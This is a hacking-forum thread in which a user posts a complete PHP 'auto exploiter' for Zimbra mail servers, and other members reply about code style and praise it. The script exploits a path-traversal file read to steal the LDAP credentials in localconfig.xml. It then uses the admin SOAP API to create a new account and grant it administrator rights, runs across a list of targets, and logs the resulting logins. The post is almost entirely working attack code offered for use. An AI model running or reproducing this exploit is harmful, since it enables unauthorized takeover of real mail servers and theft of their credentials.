Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Zimbra Privilegie Escalation

  • 0 Vote(s) - 0 Average


03-06-2017, 09:49 PM #1
shor7cut Offline Junior Member **
Registered
Posts:8 Threads:7 Joined:Mar 2017 Reputation: -1
Mood: None
Code:
<?php
/**
* Name       : Auto Exploit Zimbra Privilegie Escalation LFI v.1b061614
* Author     : Shor7cut
* Website    : http://facebook.com/bug7sec
* Thank's    : Sohai & Tu5b0l3d
*----------------------------------------------
* BUG7SEC TEAM | INDOXPLOIT | TUBAN CYBER TEAM | DEFACER TERSAKITI
*----------------------------------------------
*/
error_reporting(0);
set_time_limit();
class zimbra
{
public function post($url,$post)
{
$ch = curl_init ($url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
curl_setopt ($ch, CURLOPT_TIMEOUT, 30); //timeout in seconds
curl_setopt ($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt ($ch, CURLOPT_COOKIEFILE,'coker_log');
return curl_exec ($ch);
}
public function get($url){
$ch = curl_init ($url);
       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
       curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
       curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
       curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
       curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
       curl_setopt ($ch, CURLOPT_ENCODING, "gzip");
       curl_setopt ($ch, CURLOPT_COOKIEJAR,'coker_log');
       curl_setopt ($ch, CURLOPT_COOKIEFILE,'coker_log');
       curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
curl_setopt ($ch, CURLOPT_TIMEOUT, 30); //timeout in seconds
       return curl_exec($ch);
}

public function soap($url,$token,$body){
$body = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"><authToken>$token</authToken></context></soap:Header><soap:Body>$body</soap:Body></soap:Envelope>";
return zimbra::post("https://$url:7071/service/admin/soap",$body);
}
function exploit($url,$payload,$username,$password){
echo "[".date("H:i:s")."][Payload]   : ";
$result = zimbra::get($payload);
echo "Success\n";
$ruser = explode('<key"]="name=\"zimbra_user\">', $result);
preg_match('/a\["<value>(.*?)<\/value>/', $ruser[1], $matchUser);
$rpass = explode('<key"]="name=\"zimbra_ldap_password\">', $result);
                   preg_match('/a\["<value>(.*?)<\/value>/', $rpass[1], $matchUserpass);
       echo "[".date("H:i:s")."][Create Ac] : ";
       if($matchUser[1] && $matchUserpass[1]){
        echo "Success \r\n\n";
        $body = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
                  <env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\" xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/></env:Header><env:Body><ns1:AuthRequest><account by=\"name\">$matchUser[1]</account><password>$matchUserpass[1]</password></ns1:AuthRequest></env:Body></env:Envelope>";
          preg_match('/<authToken>(.*)<\/authToken>/', zimbra::post("https://$url:7071/service/admin/soap",$body) , $tetek);
       if(isset($tetek[1])){        
       $domain  = zimbra::soap($url,$tetek[1],@("<GetAllDomainsRequest xmlns=\"urn:zimbraAdmin\"></GetAllDomainsRequest>"));
       preg_match('/<a n=\"zimbraDomainName\">(.*?)<\/a>/', $domain, $domainMatch);
       $account = zimbra::soap($url,$tetek[1],@("<CreateAccountRequest xmlns=\"urn:zimbraAdmin\"><name>$[email protected]$domainMatch[1]</name><password>$password</password></CreateAccountRequest>"));
       $re      = "/account id=\"(.*?)\" name=\"(.*?)\"/"; preg_match($re, $account, $matches);
       $modCc = zimbra::soap($url,$tetek[1],@("<ModifyAccountRequest xmlns=\"urn:zimbraAdmin\"><id>$matches[1]</id><a n=\"zimbraIsAdminAccount\">TRUE</a></ModifyAccountRequest>"));
       $resent  = "/<a n=\"zimbraMailTrustedSenderListMaxNumEntries\">(.*)<\\/a>/";


/*         echo "[".date("H:i:s")."]->>[ Username : $[email protected]".$domainMatch[1]."\n";
        echo "[".date("H:i:s")."]->>[ Password : ".$password."\n";
        echo "[".date("H:i:s")."]-<<[ Login    : https://".$domainMatch[1]."/zimbraAdmin\n";
        echo "[".date("H:i:s")."]-<<[ Login    : https://".$url.":7071/zimbraAdmin\n\n";*/
$file = fopen("shor7cut-Zimbra".date("d-m-Y").".log","a");
fwrite($file,"Login ip : https://".$url."/:7071/zimbraAdmin\r\nLogin Url : https://".$domainMatch[1]."/zimbraAdmin\r\nUsername : ".$username."@".$domainMatch[1]."\r\nPassword : ".$password."\r\n\n");
fclose($file);
$file = fopen("shor7cut-ZimbraCheckers".date("d-m-Y").".log","a");
fwrite($file,$domainMatch[1]."|".$username."@".$domainMatch[1]."|".$password."\r\n");
fclose($file);
       }
       }else{
        echo "Failed \r\n\n";
       }

}
public function covers(){
print("
    @[email protected]   Auto Exploiter  -[>{ SHOR7CUT }<]-
   (\--/)  Zimbra Privilegie Escalation
  (.>__<.) LFI v.1b061614
  ^^^  ^^^
  --help / -h
")."\r\n";
}
public function site($url){
$username = "service-pasypalss"; $password = "sHosR7cuTss";
$payload = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
$linkPayload = $url."/".$payload;
zimbra::exploit($url,$linkPayload,$username,$password);
}
function arguments($argv) {
   $_ARG = array();
   foreach ($argv as $arg) {
     if (ereg('--([^=]+)=(.*)',$arg,$reg)) {
       $_ARG[$reg[1]] = $reg[2];
     } elseif(ereg('^-([a-zA-Z0-9])',$arg,$reg)) {
           $_ARG[$reg[1]] = 'true';
     } else {
           $_ARG['input'][]=$arg;
     }
   }
  return $_ARG;
}
function cli($argv){
$no=1;
zimbra::covers();
$argv = zimbra::arguments($argv);
if($argv['file']){
$lod = explode("\r\n", file_get_contents($argv['file']));
$tod = count($lod);
foreach ($lod as $key => $cites) {
echo "[".date("H:i:s")."][Kimcil]    : ".$no."|".$tod."|".($tod-$no)."\n";
echo "[".date("H:i:s")."][Target]    : ".$cites."\n";
zimbra::site($cites);$no++;
}
}if($argv['help'] || $argv['h']){
echo "\r\n[Command Helpers] php ".$argv[0]." --file=VULN.txt\r\n";
}
else{
zimbra::cover();
}
}

}
zimbra::cli($argv);
?>


source : pastebin

03-06-2017, 10:26 PM #2
1337 Offline Don't PM me for help, post it on forum ! *******
Administrators
Posts:523 Threads:106 Joined:Jun 2012 Reputation: 21
Mood: Hacker
shor7cut , please share the codes in a [code] tag.

[Image: 28jeale.jpg]
[Image: 2mzgpld.jpg]
------------------------------------------------
[#] CodeName: 1337
[#] Email: [email protected]
[#] Zone-H: http://zone-h.org/archive/special=1/notifier=1337
[#] Facebook: https://www.facebook.com/MaDLeeTs.phtm

-------------------------------------------------

[Image: o8rq6s.jpg]

03-07-2017, 12:41 AM #3
shor7cut Offline Junior Member **
Registered
Posts:8 Threads:7 Joined:Mar 2017 Reputation: -1
Mood: None
(03-06-2017, 10:26 PM)1337 Wrote:  shor7cut , please share the codes in a [code] tag.

oke.

06-14-2017, 03:41 AM #4
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
Hey Sho7cut,
why are you using an class when you are just using static functions ?
it would be better if you isolate the class Smiley1

anyway great job Smiley1

[Image: xodhvlpa.jpg]
[Image: test.php]






Forum Jump:


Users browsing this thread:1 Guest(s)